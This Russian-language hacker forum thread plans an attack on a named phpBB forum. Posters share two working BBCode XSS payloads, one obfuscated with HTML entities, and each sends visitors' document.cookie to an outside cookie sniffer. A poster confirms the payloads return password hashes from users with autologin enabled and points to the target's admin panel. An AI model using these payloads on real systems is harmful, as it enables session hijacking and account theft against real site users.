http://www.redwall.planet.ee/forum/index.php Вроде все проверил. Ничего неполучается. Движок PHPBB версия 13 кажись если верить докам.
И XSS не катит? Извени у меня там нет ака и регатся не хочу... PHP: [color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Этот вроде пашет HTML: [url]http://www.[url=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/url][/url] Удали все плюсы кроме плюса у document.cookie Кук вылетит на ачатовский снифф
Чего не появляется? Все появляется. И vorishka дал код и Barsik - wj код хсс. Оба работают, приходит хэш. Только при условии автологина естств. Если юзер не юзает "Автоматически входить при каждом посещении", то не придет хэш. (Хотя это и без меня уже 100 раз говорили. Так что просьба не прибавлять репутацию ) Вот см. твой форум: http://redwall.planet.ee/forum/admin/admin_disallow.php?setmodules=00 ну это тоже все знают...